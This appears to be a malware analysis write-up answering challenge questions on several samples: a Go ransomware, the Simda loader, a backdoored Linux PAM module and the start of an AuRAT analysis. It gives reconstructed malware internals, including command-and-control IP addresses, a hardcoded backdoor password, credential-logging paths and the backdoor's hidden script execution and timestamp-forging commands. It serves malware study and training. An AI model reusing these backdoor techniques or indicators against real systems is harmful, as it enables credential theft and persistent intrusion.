“The malware uses multiple methods to propagate to other systems. According to the string at 0xe4c09d, what is the first protocol it attempts to use for remote execution?”
At 0xe4c09d we find the string WMI, which matches the description perfectly.
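Note that 0xe4c09d is exactly three bytes past 0xE4C09A, where we found sql. Go strings are not null-terminated; each string is described by a (pointer, length) header, so the compiler can pack string data back to back. The sketch below illustrates this with a synthetic six-byte blob standing in for the binary’s data; the lengths of 3 are my assumption based on the strings themselves, and read_go_string is a hypothetical helper.

```python
import struct

BASE = 0xE4C09A
BLOB = b"sqlWMI"  # synthetic stand-in for the bytes starting at BASE

def read_go_string(header: bytes) -> str:
    """Resolve a 16-byte Go string header (pointer, length) against BLOB."""
    ptr, length = struct.unpack("<QQ", header)
    offset = ptr - BASE
    return BLOB[offset:offset + length].decode("ascii")

# Two hypothetical headers pointing into the same run of bytes.
first = struct.pack("<QQ", 0xE4C09A, 3)
second = struct.pack("<QQ", 0xE4C09D, 3)
print(read_go_string(first), read_go_string(second))
```

This is also why running a plain strings tool over Go binaries tends to produce long concatenated blobs rather than individual strings.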
“To identify vulnerable file shares for lateral movement, the malware checks for a specific open port number. What is this port?”
Surely this will be the SMB port 445, or perhaps 139.
We’re looking for functions related to network shares; searching for share presents us with a bunch of functions in the HCWin/shares namespace, and we spot isSMBPortOpen. Indeed, this checks port 445, and we can trace a path from main_encryptNetworkShares to this function.
“The malware contains a hardcoded list of files to skip to ensure the OS remains bootable. Which hidden system directory related to deleted files is explicitly excluded?”
We identify main_findFiles as the function responsible for walking the file system. Inside, it calls path_filepath_Walkdir and supplies main_FindFiles_func1 as the function to execute for every directory.
main_FindFiles_func1 is a bit of a mess, but we find a reference to a list of file names that starts with $recycle.bin. It appears there are 0x17 entries in the list; the next one is $windows.~bt.
“To avoid encrypting its own instructions, the malware excludes a specific filename from the encryption list. What is the name of this note file?”
That’s in the same function, but not in the same list: R3ADME_1Vks5fYe.txt.
“The malware uses a checksum algorithm to identify files it has already encrypted. What is the expected total length (including the dot) of the extension validated in ‘isValidExtension’?”
Right at the top of isValidExtension, argument 2 is compared to 9 and the first character of argument 1 is checked not to be a dot. The rest of the function assumes length 9, so the length is not actually used.
“The malware generates a random symmetric key for each file. Based on the buffer size passed to crypto/rand.Read, what is the bit length of this key?”
We can cross-reference from crypto_rand_Read, and see that it’s called from main_encryptFile twice; once to get 32 bytes of data, and once to get 12 bytes. Without diving into the crypto, this smells very much like the IETF’s variant of ChaCha20, with a 32-byte key and a 12-byte nonce. That means we’re looking at a 256-bit key.
“To secure the per-file symmetric keys, the malware encrypts them using a public key algorithm. Which specific padding scheme is used with RSA?”
A bit further down, after loading the RSA key, we see a call to crypto_rsa_EncryptOAEP. Thus the padding scheme used here is OAEP.
“The malware creates a header for encrypted files. What 4-byte ASCII string (Magic Marker) is written at the very end of the file header?”
Scrolling through the EncryptFile function, we make note of a remarkable constant (uint8 *) RDPSSDNE. Further down, we observe that a pointer halfway into the buffer is passed to bytes__ptr_Buffer_Write, writing four bytes. In little-endian order, we would write ENDS. That matches the description too well to be a coincidence.
“For large files, the malware does not encrypt the entire content to save time. What single character does it write to the file footer to indicate this mode?”
It would appear this relates to main_generatePartialEncryptionOffsets, which seems to return a pointer if partial encryption is necessary. The subsequent branch reveals that the character P is used when we’re partially encrypting.
PartialEncryptionOffsets = (_QWORD *)main_generatePartialEncryptionOffsets(v238, (__int64)v99, 32, 32);
if ( PartialEncryptionOffsets )
  v101 = *PartialEncryptionOffsets;
else
  v101 = 0;
if ( v101 )
{
  v104 = PartialEncryptionOffsets;
  v87 = 'P';
}
A bit further down, a debug message describes a case where it’s falling back to ‘full encryption’, and in that case v87 is set to C. This further strengthens our hypothesis that v87 is the distinctive character. Tracing it through the function, we observe it being written to the buffer using bytes__ptr_Buffer_WriteByte.
“The malware uses a specific Windows API function from user32.dll to apply the new wallpaper. What is the name of this function?”
Changing gears again, we search for a function related to a wallpaper and find main_changeWallpaper. It contains a single API call to SystemParametersInfoW.
if ( HCWin_apihash__ptr_APIHash_CallAPI("SystemParametersInfoW", 21, v2, 10, &v9) )
“The malware uses above mentioned API to change the desktop wallpaper. What specific SPI constant (by name) is passed as the ‘uiAction’ argument to trigger this behavior?”
The function signature is as follows:
BOOL SystemParametersInfoW(
  [in]      UINT  uiAction,
  [in]      UINT  uiParam,
  [in, out] PVOID pvParam,
  [in]      UINT  fWinIni
);
Because of the indirection through HCWin_apihash__ptr_APIHash_CallAPI, we’ll need to look into v9 for the arguments. We see that it’s set to 0x14, and looking at the Microsoft documentation, we find that this corresponds to SPI_SETDESKWALLPAPER.
“In the fallback self-destruct mechanism, the malware drops a VBScript to disk. Which Windows executable is explicitly invoked to run this script silently?”
We’re looking at main_selfDestruct for this. It contains three routines in a cascading if-else-construction. As we’re looking for the ‘fallback’, we’ll start at the final routine: main_deleteSelfViaWMI. Indeed, we immediately spot cleanup.vbs, which is passed as a parameter to a fmt/Sprintf call that constructs a wscript.exe command.
Simda is a sample in the botnet category, but the description suggests it is a loader. We’ll have a look where this takes us.
Before we start answering the research questions, we note that the _start function does not decompile nicely in Binary Ninja. IDA seems to handle it a bit better; there are some push-ret-trampolines that seem to break the control flow analysis. Consider the following snippet:
00401394 689a134000 push sub_40139a {__return_addr}
00401399 c3 retn {__return_addr}
{ Continuation of function sub_40139a }
00401394 689a134000 push sub_40139a {var_4}
00401399 c3 retn {var_4} {sub_40139a} {sub_40139a}
0040139a int32_t sub_40139a()
0040139a 68a0134000 push data_4013a0 {var_4}
0040139f c3 retn {var_4} {data_4013a0} {data_4013a0}
004013a0 68a6134000 push 0x4013a6 {var_4}
004013a5 c3 retn {var_4} {0x4013a6} {0x4013a6}
004013a6 a188a04c00 mov eax, dword [data_4ca088]
Each combination of push and return simply jumps to the next instruction. This means we can replace all of them by NOP instructions. This improves the decompilation, as Binary Ninja is now able to recognize that sub_40139a was not really a function but simply the tail of _start.
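The patching step can be sketched in a few lines of Python. This is a minimal sketch that works on a raw byte string rather than on the Binary Ninja database; the function name nop_trampolines and the base-address parameter are our own, and the linear byte scan is an assumption that happens to hold for the snippet above (it could misfire on data that merely looks like push/ret).

```python
import struct

NOP = 0x90


def nop_trampolines(code: bytes, base: int) -> bytes:
    """Replace `push imm32; ret` pairs that jump to the very next address with NOPs."""
    out = bytearray(code)
    i = 0
    while i + 6 <= len(out):
        # 0x68 is `push imm32`, 0xC3 is `ret`; together they take six bytes.
        if out[i] == 0x68 and out[i + 5] == 0xC3:
            (target,) = struct.unpack_from("<I", out, i + 1)
            # Only patch when the pushed address is the address right after the ret.
            if target == base + i + 6:
                out[i : i + 6] = bytes([NOP]) * 6
                i += 6
                continue
        i += 1
    return bytes(out)


# Bytes copied from the listing above, starting at 0x401394.
snippet = bytes.fromhex(
    "689a134000c3"  # push 0x40139a; ret
    "68a0134000c3"  # push 0x4013a0; ret
    "68a6134000c3"  # push 0x4013a6; ret
    "a188a04c00"    # mov eax, dword [0x4ca088]
)
patched = nop_trampolines(snippet, 0x401394)
print(patched.hex())
```

The three trampolines collapse into eighteen NOP bytes and the mov instruction is left untouched, which is what lets the decompiler treat the whole range as straight-line code.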
With that out of the way, let’s dig in.
“What is the first windows API used by the malware to allocate memory?”
Clicking through the functions called from _start, we see a call to GetProcAddress and LoadLibrary to load VirtualAllocEx in sub_4016b0.
“What does the second parameter given to RegOpenKeyA call point to?”
That’s the subkey parameter, pointing to the string clsid\{d66d6f99-cdaa-11d0-b822-00c04fc9b31f}. Apparently that’s the CLSID Multi Language ConvertCharset.
“The malware dynamically resolves Windows API function names in memory, and decrypts a large blob of data, which function is responsible for grabbing the encrypted blobs? Provide address in hex”
The _start function appears to build up a data structure with pointers into the executable in sub_4014f0. Then, after memory has been allocated, we see a loop that walks through the buffer in chunks of 0x44 bytes and calls sub_4011b0 to move the data from the raw executable to the buffer. Note that it skips 0x1f bytes between each 0x44-byte chunk; these 0x1f bytes do not count towards the buffer size. The function that grabs the encrypted blobs is therefore sub_4011b0, at 0x4011b0.
“The malware uses a dynamic key for decryption, What is the initial decryption key used to decrypt the encrypted blobs (word size)?”
After the loop, sub_401000 performs the decryption. Internally, we see a call to sub_401650 where the actual XOR operation happens. Both functions appear to contain some seemingly meaningless instructions, perhaps to obfuscate their behavior. The decryption is simple: the counter i is added to each 32-bit ciphertext word, and the result is XOR’ed with the value passed as the second argument: i + 0xb0b6. The value of i starts off at 0, and is incremented by 4 on each loop.
It’s remarkable that the decryption starts off with a 16-bit key, while all of the arithmetic is 32-bit. This means that the top half of each 32-bit value is not touched. From sub_4014f0 we learn that the encrypted data is stored at 0x401714, and indeed we can make out some readable fragments every two bytes; surely, Vi..ua..re starts with Virtual.
00000000: 00 70 08 00 f1 d5 74 50 c4 df 63 41 d2 d4 72 65 .p....tP..cA..re
00000010: a5 c3 00 00 b6 e6 69 72 aa c5 61 6c 77 dc 6c 6f ......ir..alw.lo
00000020: 95 b0 00 00 b6 b0 56 69 84 c4 75 61 8a f6 72 65 ......Vi..ua..re
00000030: 5b b0 00 00 b6 b0 00 55 50 dd 61 70 80 d9 65 77 [......UP.ap..ew
00000040: 81 d6 46 69 5a d5 00 00 01 01 01 01 01 01 01 01 ..FiZ...........
Note that the structure at 0x401710 starts with a four-byte length field (0x87000 in the dump above), immediately followed by the encrypted data at 0x401714. The routine at sub_401180 accesses this length field.
“What is the name of the first Windows API function decrypted”
Before we can continue, let us decrypt the remainder of the executable. We could of course run the binary in a debugger and break after decryption, but where’s the fun in that? Instead, we reimplement the decryption routine.
def copy_chunks(addr, size):
    # Yield the ciphertext in chunks of at most 0x44 bytes, skipping the
    # 0x1F filler bytes that follow each chunk in the executable.
    offset = 0
    data_read = 0
    while data_read < size:
        chunk = min(0x44, size - data_read)
        yield bv.read(addr + offset, chunk)
        offset += chunk + 0x1F
        data_read += chunk


def decrypt(buffer):
    # Process the buffer one little-endian 32-bit word at a time.
    output = bytes()
    key = 0xB0B6
    for i in range(0, len(buffer), 4):
        c = int.from_bytes(buffer[i : i + 4], byteorder="little")
        p = (c + i) ^ (key + i)
        output += int.to_bytes(p & 0xFFFFFFFF, length=4, byteorder="little")
    return output


# bv is the BinaryView of the currently open Binary Ninja database.
shellcode_struct = 0x401710
size = int.from_bytes(bv.read(shellcode_struct, 4), byteorder="little")
ciphertext = b"".join(copy_chunks(shellcode_struct + 4, size))
plaintext_addr = 0x900000
bv.memory_map.add_memory_region("decrypted", plaintext_addr, decrypt(ciphertext))
bv.write(plaintext_addr, decrypt(ciphertext))
The very first string that is decrypted is GetProcAddress.
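We can double-check this without opening Binary Ninja at all. The sketch below applies the same word-wise transform to the first sixteen ciphertext bytes from the hex dump above (the bytes right after the four-byte length field); the helper name decrypt_words is ours.

```python
KEY = 0xB0B6  # initial key observed in the call to sub_401650


def decrypt_words(buf: bytes, key: int = KEY) -> bytes:
    """Add the byte offset to each 32-bit word, then XOR with key + offset."""
    out = bytearray()
    for i in range(0, len(buf), 4):
        c = int.from_bytes(buf[i : i + 4], "little")
        p = ((c + i) ^ (key + i)) & 0xFFFFFFFF
        out += p.to_bytes(4, "little")
    return bytes(out)


# Offsets 0x04..0x13 of the dump: the first four ciphertext words.
first_words = bytes.fromhex("f1d57450 c4df6341 d2d47265 a5c30000")
print(decrypt_words(first_words))  # b'GetProcAddress\x00\x00'
```

Because the key and the counter both stay below 0x10000 this early in the buffer, only the low half of each word changes, which explains the readable two-byte fragments in the raw dump.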
I spent some time adding the decrypted code in a new segment within the same Binary Ninja database, eventually figuring out that the correct API to call is bv.memory_map.add_memory_region. I’m not sure there’s a tangible benefit, but it keeps everything in one place.
“What is the address of the ret instruction responsible for jumping to decrypted shellcode?”
At the end of _start, we see an offset into the decrypted buffer being loaded into memory (0x86ed0). Tracing the code a bit into sub_401130, we observe the offset being loaded into ecx and then jumped to via the push-and-return we’ve been seeing a lot of so far. It would appear this is the entrypoint into the decrypted code.
The return that is responsible for the jump into the shellcode happens at 0x401167.
We note that before jumping to the shellcode, the image base address and a flag value are pushed to the stack. The flag appears to relate to the relative position of _start within the image (see 0x00401622 to 0x0040163c).
“Based on the memory allocated by the malware, what is the offset of the first instruction executed after decryption? in hex”
We went into this for question 6; the entrypoint is at 0x86ed0. We quickly end up in sub_86670, which is responsible for resolving API functions. It takes the list of functions at the start of the shellcode and passes them to GetProcAddress. The result is an array of references to these API functions.
“What is the second API called by the malware after decryption?”
Let’s have a look at the entrypoint, and define some code.
At sub_868d0, we see a memset routine. The resulting buffer is then passed to sub_86670, where it is populated with references to a bunch of API functions. This is done by first locating a DLL that starts with KER (presumably kernel32.dll) in the Import Address Table, finding GetProcAddress, and then using that to load LoadLibraryExA, loading kernel32.dll again. This second reference to kernel32 is then used to obtain references to 14 API functions using GetProcAddress.
The function this question was looking for was LoadLibraryExA, though.
It would be nice to create a type structure that exposes these API functions somehow.
“The malware decrypts another part in memory with another dynamic key, what is the fixed addition value to the key in hex (word size)?”
This is what’s happening at sub_86e80. The decryption is similar to the one before, just with a different key.
00986e9c for (int32_t i = 0; i u< size; i += 4)
00986eaf     *(arg1 + i) += i
00986ec8     *(arg1 + i) ^= i + 0x3e9
The constant we’re looking for is 0x03e9 (note the leading zero). Just before the decryption call we see a function that serves as memcpy, copying 0x86470 bytes from offset 0x9000f4 (i.e., 0xf4 bytes into the original buffer).
After decrypting, we obtain a complete PE file. Now is perhaps a good time to dump it to a file and start a new Binary Ninja database. Presumably the function at sub_86c70 populates the imports using the resolved addresses in sub_86670.
“There are 3 hardcoded IPs, list them in the format: IP1,IP2,IP3 (same order as found)”
We’re looking for IP addresses; presumably IPv4. The Binary Refinery tool ‘xtp’ allows us to quickly extract IOCs of fixed formats, and IP addresses are easily recognizable.
Running xtp gives us:
212.117.176.187
79.133.196.94
69.57.173.222
94.75.201.1
209.85.143.99
102.54.94.97
38.25.63.10
127.0.0.1
173.194.37.104
8.8.8.8
1.0.0.0
6.0.0.0
While not all of those may be IP addresses, at least we can now search for them in the binary and look at their context. The first three show up at 0x00410954. There’s no immediate cross-reference to 212.117.176.187, but the next two are referenced from sub_40a839, which is indeed called from _start.
Going through the remainder of the list, the IP addresses are part of larger blobs of text. Presumably the hardcoded IP addresses were the first three we found.
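For readers without Binary Refinery at hand, the same kind of extraction can be approximated with a regular expression. To be clear, this is not how xtp is implemented; it is a rough sketch with our own names (IPV4, find_ipv4) and a made-up sample blob, and it only reports candidates with their offsets so that we can go and inspect the context.

```python
import re

# One decimal octet in the range 0..255.
OCTET = rb"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
# Four octets, not glued to further digits or dots on either side.
IPV4 = re.compile(rb"(?<![\d.])" + OCTET + rb"(?:\." + OCTET + rb"){3}(?![\d.])")


def find_ipv4(blob: bytes) -> list[tuple[int, str]]:
    """Return (offset, address) pairs for every IPv4-looking string in blob."""
    return [(m.start(), m.group().decode("ascii")) for m in IPV4.finditer(blob)]


# Hypothetical blob: three NUL-separated addresses plus a version-like string.
sample = b"\x00212.117.176.187\x0079.133.196.94\x0069.57.173.222\x00v1.2.3.4.5\x00"
for offset, ip in find_ipv4(sample):
    print(hex(offset), ip)
```

The surrounding lookarounds are what reject strings such as 1.2.3.4.5, which are more likely version numbers than addresses. Candidates like 1.0.0.0 or 6.0.0.0 would still match, so manual review of the context remains necessary.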
“What is the address of the function that perform anti analysis checks”
The string IsDebuggerPresent occurs, but I do not immediately find cross-references. Instead, scrolling down from the top of _start and checking for conditionals, we identify a check for the result of sub_401b98.
Inside, we quickly spot a number of checks that appear to relate to anti-analysis. The loops, one of which sits at 0x401ca5, check for a list of processes (listed at 0x40cdc8 and 0x40d608), including tools like Wireshark, Regshot, Ollydbg and VirtualBox Guest Additions.
“The malware will use completely different 3 IPs than the hardcoded ones, list them in order: 7x.xxx.xx.xxx,2xx.xx.xx.xx,1xx.xxx.xx.xxx”
We find the hardcoded IP addresses in sub_40a839. They appear to be default values when the globals data_425470 and data_425578 are not populated, though. Setting a breakpoint on 0x0040a899 would surely reveal the IP addresses.
I fear we cannot possibly justify static analysis for this question, especially considering how clear it is when and where we would need to inspect the memory.
We’ll have to skip over the anti-analysis function at sub_401b98 discussed in the previous question, though. We set a breakpoint at 0x00402295, where it is called, and modify the instruction pointer and return value to follow the subsequent conditional jump.
At 0x425470 we find 217.23.12.63 and at 0x425578 we find 109.236.87.106. Scrolling up a bit through memory, we find 79.142.66.239 at 0x425250. All three globals are populated in sub_407805, which initializes several other globals.
“To which Windows environment variable–based folder does the malware copy itself?”
The malware references the CopyFileA and CopyFileW APIs, so we can have a look at the instances where these are called.
At 0x00405d40 we see a reference to CopyFileA that is preceded by a call to GetModuleFileNameA. The first argument to GetModuleFileNameA is hModule = 0, which implies the file name of the current executable is retrieved. This filename is then used as lpExistingFileName. The lpNewFileName is the result of a call to ExpandEnvironmentStringsA, which resolves %appdata%\ScanDisc.exe. Thus the directory we’re looking for is %appdata%.
“What is the registry key the malware uses for persistence?”
We apply a similar strategy, this time searching for RegCreateKey calls. We identify both RegCreateKeyExA and RegCreateKeyExW.
At 0x004039cd, we see a call to RegCreateKeyExW that is preceded by a call to CopyFileW and a path resolution involving %s\%s.exe and %APPDATA%. Surely this is what we’re looking for. Indeed, the involved registry subkey is SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, which can be used for persistence.
The hive key is 0x80000001, which corresponds to HKEY_CURRENT_USER. Thus the full registry path is HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce.
“What is the argument the malware will launch itself with?”
The argument is added immediately after the call to RegCreateKeyExW, using RegSetValueExW. It’s retrieved from data_4140b4: opt.
Silent Authenticator is a backdoor. The description suggests it is a modified PAM module. Indeed, the file output tells us it’s a Shared Object file, and the entrypoint is an empty placeholder.
We do see a couple of exported functions:
pam_sm_acct_mgmt
pam_sm_setcred
pam_sm_authenticate
pam_sm_chauthtok
pam_sm_close_session
pam_sm_open_session
Let’s see where the questions direct us.
“The malware hides sensitive strings using encryption. By analyzing the decryption function, what is the single-byte XOR key stored at offset 0x00 in each encrypted string table entry?”
Clicking through the exported functions, the calls to sub_4032a0 in pam_sm_authenticate immediately stand out. Its input arguments are an integer and an uninitialized stack array, and inside we see a loop that performs an XOR operation. This is a prime candidate for string decryption.
The question suggests we’re looking at a string table. Indeed, the data at 0060c040 is structured in 16-byte chunks that look as follows:
54 00 XX 00 00 00 00 00
AB CD EF GH IJ KL MN OP
The data at byte 9 to 16 appears to be a pointer to the actual encrypted string; the third byte corresponds to its length. We can create a struct type for readability.
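The layout can be written down as a struct format string, which doubles as documentation. This is a sketch under the assumptions made above (little-endian, a 16-bit length at offset 2, padding elsewhere); the names StringEntry, parse_entry and entry_offset are ours, and the pointer value in the example is made up.

```python
import struct
from typing import NamedTuple

# key byte, 1 pad byte, 16-bit length, 4 pad bytes, 64-bit pointer
ENTRY_FORMAT = "<BxH4xQ"
ENTRY_SIZE = struct.calcsize(ENTRY_FORMAT)  # 16


class StringEntry(NamedTuple):
    key: int
    length: int
    data_ptr: int


def parse_entry(raw: bytes) -> StringEntry:
    """Decode one 16-byte table entry."""
    return StringEntry(*struct.unpack(ENTRY_FORMAT, raw))


def entry_offset(index: int) -> int:
    """Byte offset of entry `index` from the start of the table."""
    return index * ENTRY_SIZE


# Hypothetical entry: key 0x54, length 14, pointer 0x60c0b0 (illustrative only).
raw = bytes.fromhex("54 00 0e 00 00 00 00 00 b0 c0 60 00 00 00 00 00")
print(parse_entry(raw))
```

Multiplying the index by 16 is the same as shifting it left by four bits, which is how a compiler would typically index a table of this entry size.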
After a bit of clean-up, the function looks as follows:
004032a0 void r_string_decryption(int16_t n, char* str)
004032b1     int16_t len = table[zx.q(n)].len
004032b1
004032b8     if (len != 0)
004032ba         int32_t i = 0
004032ba
004032dc         do
004032c4             uint64_t idx = zx.q(i.w)
004032c9             char key = i.b ^ table[zx.q(n)].header
004032cb             i += 1
004032d2             str[idx] = key ^ table[zx.q(n)].enc_data[idx]
004032d5             len = table[zx.q(n)].len
004032dc         while (len u> i.w)
004032dc
004032e1     str[zx.q(len)] = 0
The XOR key stored at offset 0x00 is 0x54.
We can reimplement the decryption in a few lines of Python:
def decrypt_entry(addr):
    # Entry layout: key byte at +0, 16-bit length at +2, data pointer at +8.
    key = int.from_bytes(bv.read(addr, 1), byteorder="little")
    length = int.from_bytes(bv.read(addr + 2, 2), byteorder="little")
    c_addr = int.from_bytes(bv.read(addr + 8, 8), byteorder="little")
    # Each byte is XOR'ed with the key and the low byte of its own index.
    plain = bytes([c ^ (i & 0xFF) ^ key for i, c in enumerate(bv.read(c_addr, length))])
    bv.write(c_addr, plain)
Although as of yet without any context, the resulting strings are:
97@I7OEaF*5a92
/var/spool/.network/
/usr/bin/.dbus.log
/usr/bin/id
touch -r /usr/bin/id /usr/bin/.db
nohup
>/dev/null 2>
“The decryption function calculates the table entry offset by shifting the index. What is the shift value used in the ‘shl’ instruction to multiply the index by the entry size?”
We see a single shl instruction, which shifts the data by 4 bits.
“Each encrypted string entry contains a pointer to the actual encrypted data. At what byte offset within the 16-byte entry structure is this pointer located?”
See Question 1; that’s the ninth byte, at offset 8.
“The string length field is stored as a 16-bit value within each entry. At what byte offset is the length field located in the entry structure?”
See Question 1; that’s the third byte, at offset 2.
“Analyzing the encrypted strings table, how many total encrypted string entries does the malware store?”
We simply count the entries: there are seven.
“The first encrypted byte of the backdook password. What is this encrypted byte value?”
It appears there’s a textual error in this question. Still, the password appears to be the first string. Indeed, when we trace its usage we end up at a strcmp call that compares it to the password provided by the user.
We assume the question means to ask for the first byte of the encrypted password string. That’s 0x6d.
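This is easy to cross-check, because the transform is its own inverse: applying it to the decrypted password must give back the encrypted bytes. A small sketch, with xor_transform as our own helper name:

```python
KEY = 0x54  # key byte at offset 0x00 of every table entry


def xor_transform(data: bytes, key: int) -> bytes:
    """XOR every byte with the key and with the low byte of its index."""
    return bytes(b ^ key ^ (i & 0xFF) for i, b in enumerate(data))


password = b"97@I7OEaF*5a92"
encrypted = xor_transform(password, KEY)

print(hex(encrypted[0]))               # 0x6d
print(xor_transform(encrypted, KEY))   # b'97@I7OEaF*5a92'
```

The first byte only involves the key (the index is zero), so 0x39 ('9') XOR 0x54 gives the 0x6d we read from the binary.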
“what is the hardcoded master password that bypasses authentication for any user?”
See Questions 1 and 6: 97@I7OEaF*5a92.
“What libc function does the malware call to compare the user-supplied password against the decrypted backdoor password?”
See Question 6.
“Before checking the backdoor password, the malware retrieves the username using a PAM API function. What is the name of this function?”
That’s the first API call right after string decryption: pam_get_user.
“After decrypting string index 2, what is the full file path where the malware stores harvested credentials?”
String index 2 is /usr/bin/.dbus.log. Indeed, when we follow its usage throughout the function we see that it is being used as the input to fputs to read and store a 512-byte buffer.
“Before writing credentials, the malware encodes them as hexadecimal. What sprintf format specifier is used for this hex encoding?”
That’s just a bit above the code that writes out the buffer; %2X
“The credential log uses a specific format string for entries. What is the prefix text that appears before the encoded username in each log entry?”
The credentials are stored using the format string error ServiceUnknown->%s : %s\n.
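To get a feel for what an entry in the log would look like, we can mimic the two format strings in Python. This is a sketch that assumes each byte is pushed through %2X individually and that both fields are encoded the same way; the helper names and the example credentials are ours.

```python
LOG_FORMAT = "error ServiceUnknown->%s : %s\n"  # format string from the binary


def hex_encode(text: str) -> str:
    """Encode every byte with the %2X specifier (assumed to be applied per byte)."""
    return "".join("%2X" % b for b in text.encode())


def log_line(username: str, password: str) -> str:
    return LOG_FORMAT % (hex_encode(username), hex_encode(password))


print(log_line("root", "hunter2"), end="")
print(repr(hex_encode("\n")))  # ' A'
```

Note that %2X pads with a space rather than a zero, so bytes below 0x10 would come out as a space followed by one hex digit. For printable ASCII credentials this makes no difference.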
“What separator string appears between the encoded username and encoded password in the log format?”
See Question 12: that’s a colon.
“When opening the credential log for writing new entries, what fopen mode string is used?”
We’re appending, using a.
“After decrypting string index 3, what is the full path to the legitimate file used as a timestamp reference?”
I don’t immediately see where it is used in relation to timestamps, but the string at index 3 is /usr/bin/id.
“After decrypting string index 4, what Unix command is used to copy the timestamp from the reference file? (First word only)”
The string at index 4 starts with the touch -r command to read the timestamp of /usr/bin/id.
“The timestamp manipulation command uses what flag to reference another file’s timestamp?”
See Question 16.
“what is the full path to the hidden directory where the malware looks for scripts to execute?”
That’s /var/spool/.network/. The directory is opened at 00403603 and its content is executed using the system call at 004036c3.
“What libc function is called to open the hidden directory for reading its contents?”
Right, that’s opendir. See Question 18.
“What libc function is called in a loop to iterate through each file in the hidden directory?”
That must be readdir.
“The malware checks the d_type field to identify regular files. What decimal value indicates a regular file (DT_REG)?”
The result of readdir is a dirent structure, which Binary Ninja conveniently parses for us. Its ->d_type is compared to 8.
“After decrypting string index 5, what Unix utility is prepended to commands to run them detached from the terminal?”
That describes nohup.
“After decrypting string index 6, what is the full output redirection string appended to executed commands?”
That’s the >/dev/null 2>&1 & string. It redirects stderr to stdout, and both of them to /dev/null.
“What libc function is used to execute the constructed command string containing nohup and the script path?”
See Question 18; that’s system.
“Before logging credentials, the malware checks if it has root privileges. What libc function returns the effective user ID?”
That’s geteuid().
“What return value from geteuid indicates the process is running as root?”
The return value 0.
“What libc function is called to check if the credential log file already exists before writing?”
That’s access.
“What is the name of the main PAM export function that contains all the backdoor logic?”
That’s the function we’ve been analyzing all along: pam_sm_authenticate.
“How many PAM module functions (pam_sm_) are exported by this malicious module?”
There are six, which we easily identify by filtering the symbol table for exported symbols.
pam_sm_acct_mgmt
pam_sm_setcred
pam_sm_authenticate
pam_sm_chauthtok
pam_sm_close_session
pam_sm_open_session
“What string identifier is passed to pam_set_data to store the authentication return value?”
That happens at several error handling branches, the first one immediately when pam_get_user fails. It’s unix_setcred_return.
“What PAM internal data identifier string is used when prompting for and storing the user’s password?”
That’s the identifier passed to a function we identify as unix_read_password, at 00403568.
“When authentication fails, pam_fail_delay is called. What is the delay value in microseconds passed to this function?”
Looking for cross-references to pam_fail_delay, we identify a single call where the value 0x1e8480 is passed. That’s 2000000 in decimal.
“What is the size in bytes of the stack buffer used to construct command strings before execution? (Decimal)”
That’s the buffer passed to the system call: its length is 0x200, or 512 in decimal.
“When reading lines from the credential log, what is the maximum line length passed to fgets?”
That’s also a buffer of 0x200 bytes.
“When updating an existing credential log entry, the malware uses a temporary file. What single-character filename is used for this temporary file?”
The file is called a; it gets renamed to /usr/bin/.dbus.log at 00403a82.
While we’re on the subject of backdoors, let’s have a look at AuRAT. I promise that that’s the reason, and not at all because I sorted on challenges that target static analysis. So far all the challenges were labeled ‘Easy’ or ‘Medium’; AuRAT is labeled ‘Hard’. I suppose there is only one way to find out what that means.
AuRAT is a DLL file that, according to the challenge description, hosts a remote access trojan and exfiltrates sensitive data.
We’re off to a good start, because when opening the file in Binary Ninja it is not recognized as a PE file; the file header is destroyed.
00000000 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 |................|
00000010 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 |......@.........|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000030 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f |................|
00000040 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 |......!..L.!This|
00000050 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 | program cannot |
00000060 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f |be run in DOS mo|
00000070 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fd 4b |de....$........K|
If we compare it to the PE header of a different file, we immediately notice that the first two bytes appear to have been dropped.
00000000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 |MZ..............|
00000010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 |........@.......|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 |................|
00000040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 |........!..L.!Th|
00000050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f |is program canno|
00000060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 |t be run in DOS |
00000070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 |mode....$.......|
We improve the file by simply prefixing the MZ bytes, but we’re not there yet.
00000000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 |MZ..............|
00000010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 |........@.......|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000030 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 |................|
00000040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 |........!..L.!Th|
00000050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f |is program canno|
00000060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 |t be run in DOS |
00000070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 |mode....$.......|
00000080 fd 4b cf a9 b9 2a a1 fa b9 2a a1 fa b9 2a a1 fa |.K...*...*...*..|
00000090 e2 42 a5 fb b3 2a a1 fa e2 42 a2 fb bc 2a a1 fa |.B...*...B...*..|
000000a0 e2 42 a4 fb 3d 2a a1 fa b2 45 a4 fb a7 2a a1 fa |.B..=*...E...*..|
000000b0 b2 45 a5 fb b7 2a a1 fa b2 45 a2 fb b1 2a a1 fa |.E...*...E...*..|
000000c0 e2 42 a0 fb ba 2a a1 fa b9 2a a0 fa ed 2a a1 fa |.B...*...*...*..|
